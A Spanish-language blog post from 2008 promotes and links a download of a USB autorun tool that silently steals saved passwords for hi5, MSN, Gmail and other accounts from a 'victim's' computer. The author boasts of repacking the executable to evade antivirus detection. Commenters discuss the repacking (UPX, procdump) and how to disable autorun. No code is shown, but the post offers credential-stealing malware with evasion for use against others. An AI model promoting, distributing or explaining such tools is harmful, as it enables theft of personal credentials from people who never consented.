Blog de Jorge Esteban


USB Roba Datos
junio 5, 2008, 1:21 am
Filed under: Software

Aqui les dejo este excelente soft… que finalidad tiene? robar contraseñas, desde hi5, msn, gmail y muchas cosas utiles mas almacenadas en la computadora de tu victima, como funciona? se instala en tu memoria usb y via autorun  al conectar tu memoria en cualquier maquina, este programa sacara los datos de la PC y los guardara en la carpeta Dump de tu memoria en formato HTML. Solo tiene un problema! es detectado por los antivirus… pero jejeje no se preocupen, aqui pienso por todos y le modifique el PE y la compresion al ejecutable y listo ya no sera detectado por los antivirus, asi que saquen datos con su usb… espero les sea util… aqui les dejo una screencap de los datos que arroja:

Free Image Hosting at www.ImageShack.us

QuickPost

Link:

RobaDatos.7z


2 comentarios so far
Deja un comentario

y le modifique el PE y la compresion al ejecutable > solo le pusiste un upx! jiji bueno igual se volvio indetectable, por lo demas, lo especial es que en mi pc no se ejecutaria aunque quisieran, pues el autorun no se ejecuta,
http://apuromafo.wordpress.com/tag/autoruninf/

en cuanto porque lo detectan los antivirus y esas cosas, es porque crean una rama en regedit, y a travez de ello logran acceder como si fueran del pc, y esas ramas que dejan, no la borran.
saludos Apuromafo

Comentario por apuromafo

Le modifique el PE tambien a los ejecutables con procdump y le actualize el upx del 1.0 a 2.0, man no lo tomes a mal pero siento que a cada post que hago tratas de hecharle tierra jeje, solo algo que siento… por cierto para que hechar a perder la ejecucion de todos los autoruns? yo tambien lo tengo desactivado(nada del otro mundo la mayoria de las personas que conozco lo tienen asi) y creo que es mas facil desde gpedit.msc >> plantillas adminitrativas y sistema >> desactivar ejecucion automatica y seleccionar las unidades que no se desean autoejecutar… habia un setting en el registro que lo desactivaba pero tambien hacia que no actualizara cuando insertaba un nuevo cd, no se si sea este, pero ahi les dejo el otro metodo por si las dudas

Comentario por TheJez




Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s



A %d blogueros les gusta esto: